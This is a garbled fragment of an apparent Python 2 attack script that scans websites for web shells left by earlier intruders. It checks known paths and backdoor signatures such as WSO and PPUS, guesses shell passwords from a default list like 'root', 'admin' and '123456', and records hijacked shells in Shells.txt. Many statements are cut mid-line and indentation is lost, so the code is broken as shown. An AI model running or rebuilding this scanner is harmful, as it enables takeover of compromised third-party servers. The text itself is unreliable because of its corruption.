year = str(now.year)
month = str(now.month)
if '10' in month or '11' in month or '12' in month :
month = month
else :
month = '0'+month
pattern_php = re.compile('<a href="(.*).php">')
pattern_phtml = re.compile('<a href="(.*).phtml">')
SH14 = site+'/shell.php'
SH16 = site+'/wp-admin/network/wp-footer.php'
SH17 = site+'/wp-info.php'
SH18 = site+'/wp-content/vuln.php'
SH20 = site+'/up.php'
SH21 = site+'/upload.php'
SH22 = site+'/upel.php'
SH23 = site+'/wp-content/uploads/'
SH24 = site+'/wp-content/uploads/'+year+'/'+month+'/'
SH25 = site+'/license.php'
SH26 = site+'/wp-content/plugins/ppus/up.php'
SH27 = site+'/098.php'
SH28 = site+'/V5.php'
SH29 = site+'/new_license.php'
SH30 = site+'/wp-content/plugins/theme-configurator/mini.php'
SH31 = site+'/wp-content/plugins/widget-logic/mini.php'
try :
site_check = requests.get(site+'/',timeout=15).content
up_check = requests.get(SH20,timeout=15).content
upload_check = requests.get(SH21,timeout=15).content
SH23_check = requests.get(SH23,timeout=15).content
SH24_check = requests.get(SH24,timeout=15).content
shell_check = requests.get(SH14,timeout=15).content
except :
password_nhzgrf = {'pass':'nhzgrf'}
password_root = {'pass':'root'}
password_r00t = {'pass':'r00t'}
password_admin = {'pass':'admin'}
password_t00r = {'pass':'t00r'}
password_123 = {'pass':'123'}
password_1234 = {'pass':'1234'}
password_12345 = {'pass':'12345'}
password_123456 = {'pass':'123456'}
password_123123 = {'pass':'123123'}
password_123321 = {'pass':'123321'}
password_123456789 = {'pass':'123456789'}
password_1234567890 = {'pass':'1234567890'}
password_haurgeulis = {'pass':'haurgeulis'}
password_rehan = {'password':'rehan'}
if 'Windows' in shell_check and 'Upload file:' in shell_check :
print ' -| '+site +'/ --> {}[Succeeded]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif 'iCloud1337 private shell' in requests.get(SH16,timeout=15).content :
print ' -| '+site +'/ --> {}[iCloud1337]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif 'Copyright 2017 | ErrOr SquaD All Rights Reserved.' in requests.get(SH17,timeout=15).content :
print ' -| '+site +'/ --> {}[ErrOrSquaD]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif 'Vuln!! patch it Now!' in requests.get(SH18,timeout=15).content :
print ' -| '+site +'/ --> {}[ExploitJok3r]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif 'Vuln!! patch it Now!' in requests.get(SH22,timeout=15).content :
print ' -| '+site +'/ --> {}[ExploitJok3r]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif '' in requests.get(SH26,timeout=15).content :
print ' -| '+site +'/ --> {}[PPUS]'.format(fg)
if 'SuramSh3ll' in requests.get(site+'/wp-content/plugins/ppus/suram.php',timeout=15).content :
with open('Shells.txt', mode='a') as d:
d.write(SH26+' | '+site+'/wp-content/plugins/ppus/suram.php\n')
else :
with open('Shells.txt', mode='a') as d:
elif 'WSO 2.6' in requests.get(SH27,timeout=15).content :
print ' -| '+site +'/ --> {}[WSO]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif 'Dr HeX' in requests.get(SH28,timeout=15).content :
print ' -| '+site +'/ --> {}[DrHeX]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif '<title>File</title>' in requests.get(SH29,timeout=15).content :
print ' -| '+site +'/ --> {}[License]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif 'U7TiM4T3_H4x0R Plugin' in requests.get(SH30,timeout=15).content :
print ' -| '+site +'/ --> {}[U7TiM4T3]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif 'U7TiM4T3_H4x0R Plugin' in requests.get(SH31,timeout=15).content :
print ' -| '+site +'/ --> {}[U7TiM4T3]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif 'Index of' in SH23_check and '.php' in SH23_check :
shells = []
if re.findall(pattern_php,SH23_check):
shells = re.findall(pattern_php,SH23_check)
for shell in shells:
sh_check = requests.get(SH23+shell+'.php',timeout=15).content
if ' type="file"' in sh_check or ' type=\'file\'' in sh_check or ' type= "file"' in sh_check or ' type= \'file\'' in sh_check or ' type = "file"' in sh_check or ' type = \'file\'' in sh_check or ' type ="file"' in sh_check or ' type =\'file\'' in sh_check or ' type=file' in sh_check or ' type =file' in sh_check or ' type= file' in sh_check or ' type = file' in sh_check or 'Upload</a> ]</li><li>[' in sh_check or 'upload</a><li><a>Sym' in sh_check :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif ' name=pass' in sh_check :
nhzgrf ='.php',data=password_nhzgrf,timeout=15).content
if ' type="file"' in nhzgrf or ' type=\'file\'' in nhzgrf or ' type= "file"' in nhzgrf or ' type= \'file\'' in nhzgrf or ' type = "file"' in nhzgrf or ' type = \'file\'' in nhzgrf or ' type ="file"' in nhzgrf or ' type =\'file\'' in nhzgrf or ' type=file' in nhzgrf or ' type =file' in nhzgrf or ' type= file' in nhzgrf or ' type = file' in nhzgrf :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
proot ='.php',data=password_root,timeout=15).content
if ' type="file"' in proot or ' type=\'file\'' in proot or ' type= "file"' in proot or ' type= \'file\'' in proot or ' type = "file"' in proot or ' type = \'file\'' in proot or ' type ="file"' in proot or ' type =\'file\'' in proot or ' type=file' in proot or ' type =file' in proot or ' type= file' in proot or ' type = file' in proot :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pr00t ='.php',data=password_r00t,timeout=15).content
if ' type="file"' in pr00t or ' type=\'file\'' in pr00t or ' type= "file"' in pr00t or ' type= \'file\'' in pr00t or ' type = "file"' in pr00t or ' type = \'file\'' in pr00t or ' type ="file"' in pr00t or ' type =\'file\'' in pr00t or ' type=file' in pr00t or ' type =file' in pr00t or ' type= file' in pr00t or ' type = file' in pr00t :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
padmin ='.php',data=password_admin,timeout=15).content
if ' type="file"' in padmin or ' type=\'file\'' in padmin or ' type= "file"' in padmin or ' type= \'file\'' in padmin or ' type = "file"' in padmin or ' type = \'file\'' in padmin or ' type ="file"' in padmin or ' type =\'file\'' in padmin or ' type=file' in padmin or ' type =file' in padmin or ' type= file' in padmin or ' type = file' in padmin :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pt00r ='.php',data=password_t00r,timeout=15).content
if ' type="file"' in pt00r or ' type=\'file\'' in pt00r or ' type= "file"' in pt00r or ' type= \'file\'' in pt00r or ' type = "file"' in pt00r or ' type = \'file\'' in pt00r or ' type ="file"' in pt00r or ' type =\'file\'' in pt00r or ' type=file' in pt00r or ' type =file' in pt00r or ' type= file' in pt00r or ' type = file' in pt00r :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123 ='.php',data=password_123,timeout=15).content
if ' type="file"' in p123 or ' type=\'file\'' in p123 or ' type= "file"' in p123 or ' type= \'file\'' in p123 or ' type = "file"' in p123 or ' type = \'file\'' in p123 or ' type ="file"' in p123 or ' type =\'file\'' in p123 or ' type=file' in p123 or ' type =file' in p123 or ' type= file' in p123 or ' type = file' in p123 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234 ='.php',data=password_1234,timeout=15).content
if ' type="file"' in p1234 or ' type=\'file\'' in p1234 or ' type= "file"' in p1234 or ' type= \'file\'' in p1234 or ' type = "file"' in p1234 or ' type = \'file\'' in p1234 or ' type ="file"' in p1234 or ' type =\'file\'' in p1234 or ' type=file' in p1234 or ' type =file' in p1234 or ' type= file' in p1234 or ' type = file' in p1234 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p12345 ='.php',data=password_12345,timeout=15).content
if ' type="file"' in p12345 or ' type=\'file\'' in p12345 or ' type= "file"' in p12345 or ' type= \'file\'' in p12345 or ' type = "file"' in p12345 or ' type = \'file\'' in p12345 or ' type ="file"' in p12345 or ' type =\'file\'' in p12345 or ' type=file' in p12345 or ' type =file' in p12345 or ' type= file' in p12345 or ' type = file' in p12345 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456 ='.php',data=password_123456,timeout=15).content
if ' type="file"' in p123456 or ' type=\'file\'' in p123456 or ' type= "file"' in p123456 or ' type= \'file\'' in p123456 or ' type = "file"' in p123456 or ' type = \'file\'' in p123456 or ' type ="file"' in p123456 or ' type =\'file\'' in p123456 or ' type=file' in p123456 or ' type =file' in p123456 or ' type= file' in p123456 or ' type = file' in p123456 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123123 ='.php',data=password_123123,timeout=15).content
if ' type="file"' in p123123 or ' type=\'file\'' in p123123 or ' type= "file"' in p123123 or ' type= \'file\'' in p123123 or ' type = "file"' in p123123 or ' type = \'file\'' in p123123 or ' type ="file"' in p123123 or ' type =\'file\'' in p123123 or ' type=file' in p123123 or ' type =file' in p123123 or ' type= file' in p123123 or ' type = file' in p123123 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123321 ='.php',data=password_123321,timeout=15).content
if ' type="file"' in p123321 or ' type=\'file\'' in p123321 or ' type= "file"' in p123321 or ' type= \'file\'' in p123321 or ' type = "file"' in p123321 or ' type = \'file\'' in p123321 or ' type ="file"' in p123321 or ' type =\'file\'' in p123321 or ' type=file' in p123321 or ' type =file' in p123321 or ' type= file' in p123321 or ' type = file' in p123321 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456789 ='.php',data=password_123456789,timeout=15).content
if ' type="file"' in p123456789 or ' type=\'file\'' in p123456789 or ' type= "file"' in p123456789 or ' type= \'file\'' in p123456789 or ' type = "file"' in p123456789 or ' type = \'file\'' in p123456789 or ' type ="file"' in p123456789 or ' type =\'file\'' in p123456789 or ' type=file' in p123456789 or ' type =file' in p123456789 or ' type= file' in p123456789 or ' type = file' in p123456789 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234567890 ='.php',data=password_1234567890,timeout=15).content
if ' type="file"' in p1234567890 or ' type=\'file\'' in p1234567890 or ' type= "file"' in p1234567890 or ' type= \'file\'' in p1234567890 or ' type = "file"' in p1234567890 or ' type = \'file\'' in p1234567890 or ' type ="file"' in p1234567890 or ' type =\'file\'' in p1234567890 or ' type=file' in p1234567890 or ' type =file' in p1234567890 or ' type= file' in p1234567890 or ' type = file' in p1234567890 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
phaurgeulis ='.php',data=password_haurgeulis,timeout=15).content
if 'Andela1C3' in phaurgeulis :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
print ' -| '+site +' --> {}[Failed]'.format(fr)
else :
print ' -| '+site +' --> {}[Failed]'.format(fr)
elif 'Index of' in SH23_check and '.phtml' in SH23_check :
shells = []
if re.findall(pattern_phtml,SH23_check):
shells = re.findall(pattern_phtml,SH23_check)
for shell in shells:
sh_check = requests.get(SH23+shell+'.phtml',timeout=15).content
if ' type="file"' in sh_check or ' type=\'file\'' in sh_check or ' type= "file"' in sh_check or ' type= \'file\'' in sh_check or ' type = "file"' in sh_check or ' type = \'file\'' in sh_check or ' type ="file"' in sh_check or ' type =\'file\'' in sh_check or ' type=file' in sh_check or ' type =file' in sh_check or ' type= file' in sh_check or ' type = file' in sh_check or 'Upload</a> ]</li><li>[' in sh_check or 'upload</a><li><a>Sym' in sh_check :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif ' name=pass' in sh_check :
nhzgrf ='.phtml',data=password_nhzgrf,timeout=15).content
if ' type="file"' in nhzgrf or ' type=\'file\'' in nhzgrf or ' type= "file"' in nhzgrf or ' type= \'file\'' in nhzgrf or ' type = "file"' in nhzgrf or ' type = \'file\'' in nhzgrf or ' type ="file"' in nhzgrf or ' type =\'file\'' in nhzgrf or ' type=file' in nhzgrf or ' type =file' in nhzgrf or ' type= file' in nhzgrf or ' type = file' in nhzgrf :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
proot ='.phtml',data=password_root,timeout=15).content
if ' type="file"' in proot or ' type=\'file\'' in proot or ' type= "file"' in proot or ' type= \'file\'' in proot or ' type = "file"' in proot or ' type = \'file\'' in proot or ' type ="file"' in proot or ' type =\'file\'' in proot or ' type=file' in proot or ' type =file' in proot or ' type= file' in proot or ' type = file' in proot :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pr00t ='.phtml',data=password_r00t,timeout=15).content
if ' type="file"' in pr00t or ' type=\'file\'' in pr00t or ' type= "file"' in pr00t or ' type= \'file\'' in pr00t or ' type = "file"' in pr00t or ' type = \'file\'' in pr00t or ' type ="file"' in pr00t or ' type =\'file\'' in pr00t or ' type=file' in pr00t or ' type =file' in pr00t or ' type= file' in pr00t or ' type = file' in pr00t :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
padmin ='.phtml',data=password_admin,timeout=15).content
if ' type="file"' in padmin or ' type=\'file\'' in padmin or ' type= "file"' in padmin or ' type= \'file\'' in padmin or ' type = "file"' in padmin or ' type = \'file\'' in padmin or ' type ="file"' in padmin or ' type =\'file\'' in padmin or ' type=file' in padmin or ' type =file' in padmin or ' type= file' in padmin or ' type = file' in padmin :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pt00r ='.phtml',data=password_t00r,timeout=15).content
if ' type="file"' in pt00r or ' type=\'file\'' in pt00r or ' type= "file"' in pt00r or ' type= \'file\'' in pt00r or ' type = "file"' in pt00r or ' type = \'file\'' in pt00r or ' type ="file"' in pt00r or ' type =\'file\'' in pt00r or ' type=file' in pt00r or ' type =file' in pt00r or ' type= file' in pt00r or ' type = file' in pt00r :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123 ='.phtml',data=password_123,timeout=15).content
if ' type="file"' in p123 or ' type=\'file\'' in p123 or ' type= "file"' in p123 or ' type= \'file\'' in p123 or ' type = "file"' in p123 or ' type = \'file\'' in p123 or ' type ="file"' in p123 or ' type =\'file\'' in p123 or ' type=file' in p123 or ' type =file' in p123 or ' type= file' in p123 or ' type = file' in p123 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234 ='.phtml',data=password_1234,timeout=15).content
if ' type="file"' in p1234 or ' type=\'file\'' in p1234 or ' type= "file"' in p1234 or ' type= \'file\'' in p1234 or ' type = "file"' in p1234 or ' type = \'file\'' in p1234 or ' type ="file"' in p1234 or ' type =\'file\'' in p1234 or ' type=file' in p1234 or ' type =file' in p1234 or ' type= file' in p1234 or ' type = file' in p1234 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p12345 ='.phtml',data=password_12345,timeout=15).content
if ' type="file"' in p12345 or ' type=\'file\'' in p12345 or ' type= "file"' in p12345 or ' type= \'file\'' in p12345 or ' type = "file"' in p12345 or ' type = \'file\'' in p12345 or ' type ="file"' in p12345 or ' type =\'file\'' in p12345 or ' type=file' in p12345 or ' type =file' in p12345 or ' type= file' in p12345 or ' type = file' in p12345 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456 ='.phtml',data=password_123456,timeout=15).content
if ' type="file"' in p123456 or ' type=\'file\'' in p123456 or ' type= "file"' in p123456 or ' type= \'file\'' in p123456 or ' type = "file"' in p123456 or ' type = \'file\'' in p123456 or ' type ="file"' in p123456 or ' type =\'file\'' in p123456 or ' type=file' in p123456 or ' type =file' in p123456 or ' type= file' in p123456 or ' type = file' in p123456 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123123 ='.phtml',data=password_123123,timeout=15).content
if ' type="file"' in p123123 or ' type=\'file\'' in p123123 or ' type= "file"' in p123123 or ' type= \'file\'' in p123123 or ' type = "file"' in p123123 or ' type = \'file\'' in p123123 or ' type ="file"' in p123123 or ' type =\'file\'' in p123123 or ' type=file' in p123123 or ' type =file' in p123123 or ' type= file' in p123123 or ' type = file' in p123123 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123321 ='.phtml',data=password_123321,timeout=15).content
if ' type="file"' in p123321 or ' type=\'file\'' in p123321 or ' type= "file"' in p123321 or ' type= \'file\'' in p123321 or ' type = "file"' in p123321 or ' type = \'file\'' in p123321 or ' type ="file"' in p123321 or ' type =\'file\'' in p123321 or ' type=file' in p123321 or ' type =file' in p123321 or ' type= file' in p123321 or ' type = file' in p123321 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456789 ='.phtml',data=password_123456789,timeout=15).content
if ' type="file"' in p123456789 or ' type=\'file\'' in p123456789 or ' type= "file"' in p123456789 or ' type= \'file\'' in p123456789 or ' type = "file"' in p123456789 or ' type = \'file\'' in p123456789 or ' type ="file"' in p123456789 or ' type =\'file\'' in p123456789 or ' type=file' in p123456789 or ' type =file' in p123456789 or ' type= file' in p123456789 or ' type = file' in p123456789 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234567890 ='.phtml',data=password_1234567890,timeout=15).content
if ' type="file"' in p1234567890 or ' type=\'file\'' in p1234567890 or ' type= "file"' in p1234567890 or ' type= \'file\'' in p1234567890 or ' type = "file"' in p1234567890 or ' type = \'file\'' in p1234567890 or ' type ="file"' in p1234567890 or ' type =\'file\'' in p1234567890 or ' type=file' in p1234567890 or ' type =file' in p1234567890 or ' type= file' in p1234567890 or ' type = file' in p1234567890 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
phaurgeulis ='.phtml',data=password_haurgeulis,timeout=15).content
if 'Andela1C3' in phaurgeulis :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
print ' -| '+site +' --> {}[Failed]'.format(fr)
else :
print ' -| '+site +' --> {}[Failed]'.format(fr)
elif 'Index of' in SH24_check and '.php' in SH24_check :
shells = []
if re.findall(pattern_php,SH24_check):
shells = re.findall(pattern_php,SH24_check)
for shell in shells:
sh_check = requests.get(SH24+shell+'.php',timeout=15).content
if ' type="file"' in sh_check or ' type=\'file\'' in sh_check or ' type= "file"' in sh_check or ' type= \'file\'' in sh_check or ' type = "file"' in sh_check or ' type = \'file\'' in sh_check or ' type ="file"' in sh_check or ' type =\'file\'' in sh_check or ' type=file' in sh_check or ' type =file' in sh_check or ' type= file' in sh_check or ' type = file' in sh_check or 'Upload</a> ]</li><li>[' in sh_check or 'upload</a><li><a>Sym' in sh_check :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif ' name=pass' in sh_check :
nhzgrf ='.php',data=password_nhzgrf,timeout=15).content
if ' type="file"' in nhzgrf or ' type=\'file\'' in nhzgrf or ' type= "file"' in nhzgrf or ' type= \'file\'' in nhzgrf or ' type = "file"' in nhzgrf or ' type = \'file\'' in nhzgrf or ' type ="file"' in nhzgrf or ' type =\'file\'' in nhzgrf or ' type=file' in nhzgrf or ' type =file' in nhzgrf or ' type= file' in nhzgrf or ' type = file' in nhzgrf :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
proot ='.php',data=password_root,timeout=15).content
if ' type="file"' in proot or ' type=\'file\'' in proot or ' type= "file"' in proot or ' type= \'file\'' in proot or ' type = "file"' in proot or ' type = \'file\'' in proot or ' type ="file"' in proot or ' type =\'file\'' in proot or ' type=file' in proot or ' type =file' in proot or ' type= file' in proot or ' type = file' in proot :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pr00t ='.php',data=password_r00t,timeout=15).content
if ' type="file"' in pr00t or ' type=\'file\'' in pr00t or ' type= "file"' in pr00t or ' type= \'file\'' in pr00t or ' type = "file"' in pr00t or ' type = \'file\'' in pr00t or ' type ="file"' in pr00t or ' type =\'file\'' in pr00t or ' type=file' in pr00t or ' type =file' in pr00t or ' type= file' in pr00t or ' type = file' in pr00t :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
padmin ='.php',data=password_admin,timeout=15).content
if ' type="file"' in padmin or ' type=\'file\'' in padmin or ' type= "file"' in padmin or ' type= \'file\'' in padmin or ' type = "file"' in padmin or ' type = \'file\'' in padmin or ' type ="file"' in padmin or ' type =\'file\'' in padmin or ' type=file' in padmin or ' type =file' in padmin or ' type= file' in padmin or ' type = file' in padmin :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pt00r ='.php',data=password_t00r,timeout=15).content
if ' type="file"' in pt00r or ' type=\'file\'' in pt00r or ' type= "file"' in pt00r or ' type= \'file\'' in pt00r or ' type = "file"' in pt00r or ' type = \'file\'' in pt00r or ' type ="file"' in pt00r or ' type =\'file\'' in pt00r or ' type=file' in pt00r or ' type =file' in pt00r or ' type= file' in pt00r or ' type = file' in pt00r :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123 ='.php',data=password_123,timeout=15).content
if ' type="file"' in p123 or ' type=\'file\'' in p123 or ' type= "file"' in p123 or ' type= \'file\'' in p123 or ' type = "file"' in p123 or ' type = \'file\'' in p123 or ' type ="file"' in p123 or ' type =\'file\'' in p123 or ' type=file' in p123 or ' type =file' in p123 or ' type= file' in p123 or ' type = file' in p123 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234 ='.php',data=password_1234,timeout=15).content
if ' type="file"' in p1234 or ' type=\'file\'' in p1234 or ' type= "file"' in p1234 or ' type= \'file\'' in p1234 or ' type = "file"' in p1234 or ' type = \'file\'' in p1234 or ' type ="file"' in p1234 or ' type =\'file\'' in p1234 or ' type=file' in p1234 or ' type =file' in p1234 or ' type= file' in p1234 or ' type = file' in p1234 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d: